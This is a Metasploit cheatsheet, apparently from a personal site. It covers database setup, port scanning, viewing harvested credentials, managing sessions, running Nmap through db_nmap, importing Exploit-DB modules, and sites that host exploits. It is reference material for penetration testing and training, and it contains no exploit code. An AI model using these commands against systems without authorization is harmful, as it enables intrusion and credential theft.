Metasploit Cheatsheet
Table of Contents
enabling the database#
Metasploit can be configured to save the loot in the database for reference. The loot includes, among others, stuff like hosts, creds and vulns.
# Set up the database
systemctl enable postgresql
sudo msfdb init
# Use the db
msf6 > db_status # check the connection
msf6 > db_import <filename> # import data from external tools, e.g. Nmap
msf6 > db_connect -y /usr/share/metasploit-framework/config/database.yml
msf6 > db_export # exports the db; useful if you're using different attacking machines
It’s worth running db_import without a parameter to ensure the connection with the database is actually working, as db_status might lie.
workspaces#
msf6 > workspace # list workspaces
msf6 > workspace -a <name> # add a workspace and switch to it immediately
hosts#
msf6 > hosts # show targets we interacted with
creds#
msf6 > creds # show credentials extracted using Metasploit modules
search for and use the modules#
msf6 > search portscan # search for port scanning modules
msf6 > use <index>
msf6 > search ftp type:aux # filter modules by type
ports scanning#
msf6 > use auxiliary/scanner/portscan/tcp # exemplary payload
msf6 > options # list available options
msf6 > advanced # list advanced options
msf6 > set RHOSTS <target_ip_1> [<target_ip_2>]
msf6 > set PORTS 1-10000
msf6 > exploit # or `run` but we are the l33t
services#
msf6 > services # shows services running on the hosts we interacted with
global settings#
msf6 > setg RHOSTS <target_ip> # set an option globally for the active workspace's scope
sessions#
msf6 > sessions # list active connections
msf6 > sessions [-i] <id> # start session <id>
msf6 > background # exit the session without closing the connection
msf6 > sessions -k <id> # kill the session
shell commands#
msf6 > curl -I <target_ip> # easy; add `-k|--insecure` to skip certificate validation
combining Metasploit with Nmap#
msf6 > db_nmap <params> # calls Nmap with params and saves the results in the database
msf6 > services # list the services identified with db_nmap
💡 You can also use
rustscan.
importing modules to Metasploit#
Not every Metasploit payload is available to find with search. If we stumble upon one, e.g. on Exploit-DB, we can import it to Metasploit by copying or symlinking it:
# for Kali Linux
cp /usr/share/exploitdb/exploits/php/remote/9939.rb /usr/share/metasploit-framework/modules # if you have a disk space
ln -s /usr/share/exploitdb/exploits/php/remote/9939.rb /usr/share/metasploit-framework/modules # if you don't ¯\_(ツ)_/¯
💡
python-based modules might need code adjustments to work with Metasploit
services that host payloads#
- Exploit-DB - you probably know that one anyway
- Sploitus
- Packet Storm
- 0day.today
dank meme#
